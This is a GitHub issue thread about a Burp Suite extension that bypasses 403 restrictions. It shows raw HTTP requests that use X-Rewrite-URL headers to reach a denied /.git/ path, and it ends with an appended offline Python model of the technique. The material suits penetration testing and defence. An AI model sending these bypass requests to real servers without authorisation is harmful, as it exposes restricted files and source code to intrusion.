sting8k / BurpSuite_403Bypasser

Burpsuite Extension to bypass 403 restricted directory
1.55k stars 204 forks

X-Original-Url / X-Rewrite-Url bypass #4

Closed rumiljonov closed 3 years ago

rumiljonov commented 3 years ago

Hey, I think you are using the X-Original-Url / X-Rewrite-Url vector in the wrong way. These headers usually help to bypass front-server rules that are based on the URI, but you don't change the URI while using these headers.

First, normal request returns 403:

GET /.git/ HTTP/1.1
Host: example.com

This attempt to bypass will return 403 too, because the URI hasn't changed and the rule still applies:

GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

This one should bypass the restriction:

GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/

sting8k commented 3 years ago

Thank you, fixed in new update.

abdulx01 commented 2 years ago

Hi, I also checked this method, but it's the home page in the response.

ler-exploit commented 1 year ago

Hi, I also checked this method, but it's the home page in the response.

I have the same problem, did you fix it?
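Added example, not part of BurpSuite_403Bypasser and not code from any commenter: an offline model of the point rumiljonov makes (the request line must name an allowed path, with the denied path moved into X-Rewrite-URL / X-Original-URL) together with the check the later "it's the home page" reports call for. The front-end deny rules, the back-end paths and bodies, and the assumption that the modelled back-end routes on those headers are all constructed for the example; a real target may ignore the headers entirely, which is exactly the case the `probe` function refuses to count as a bypass.

```python
"""
Added example (not part of BurpSuite_403Bypasser or of any commenter's post):
an offline model of the X-Rewrite-URL / X-Original-URL bypass discussed in
this issue. The ACL rules, back-end paths and bodies are constructed.
"""
from typing import Dict, Optional, Tuple

# Constructed front-end rule set: deny by request-line path prefix, the kind of
# rule a reverse proxy applies before the request reaches the application.
DENIED_PREFIXES = ("/.git", "/admin")

# Headers some back-ends accept as "the real URL" (assumption: the modelled
# back-end honours both, case-insensitively).
REWRITE_HEADERS = ("x-rewrite-url", "x-original-url")

# Constructed back-end content keyed by the path the application routes on.
BACKEND_CONTENT = {
    "/": "<html>home page</html>",
    "/.git/": "ref: refs/heads/master\n",
    "/admin": "<html>admin panel</html>",
}


def front_end_allows(path: str) -> bool:
    """Front-end ACL: only looks at the request-line path, never at headers."""
    return not any(path.startswith(p) for p in DENIED_PREFIXES)


def back_end(path: str, headers: Dict[str, str], honours_rewrite: bool) -> Tuple[int, str]:
    """Route on the request-line path, or on X-Rewrite-URL / X-Original-URL
    when the back-end is configured to trust those headers."""
    if honours_rewrite:
        for name, value in headers.items():
            if name.lower() in REWRITE_HEADERS:
                path = value
                break
    body = BACKEND_CONTENT.get(path)
    return (200, body) if body is not None else (404, "not found")


def send(path: str, headers: Optional[Dict[str, str]] = None,
         honours_rewrite: bool = True) -> Tuple[int, str]:
    """One request through the front-end ACL, then the back-end: (status, body)."""
    headers = headers or {}
    if not front_end_allows(path):
        return 403, "forbidden"
    return back_end(path, headers, honours_rewrite)


def probe(target: str, honours_rewrite: bool = True) -> Dict[str, object]:
    """Try the header bypass the way the issue describes, and only report a
    bypass when the response differs from the baseline home page."""
    _, baseline_body = send("/", honours_rewrite=honours_rewrite)
    # Wrong way: the request line still names the denied path, so the ACL fires
    # regardless of the header.
    wrong_status, _ = send(target, {"X-Rewrite-URL": target}, honours_rewrite)
    # Right way: request an allowed path and move the target into the header.
    right_status, right_body = send("/", {"X-Rewrite-URL": target}, honours_rewrite)
    # A 200 whose body equals the home page means the back-end ignored the
    # header (the false positive reported in this thread), not a bypass.
    bypassed = right_status == 200 and right_body != baseline_body
    return {
        "wrong_way_status": wrong_status,
        "right_way_status": right_status,
        "bypassed": bypassed,
    }


if __name__ == "__main__":
    for honours in (True, False):
        print(f"back-end honours rewrite headers={honours}:", probe("/.git/", honours))
```

Run against a real target, the same comparison applies: keep the body (or at least its length and a hash) of a plain `GET /`, and treat a 200 from `GET /` + `X-Rewrite-URL: /.git/` as a bypass only when that body changes; an unchanged home page just means the back-end never looked at the header.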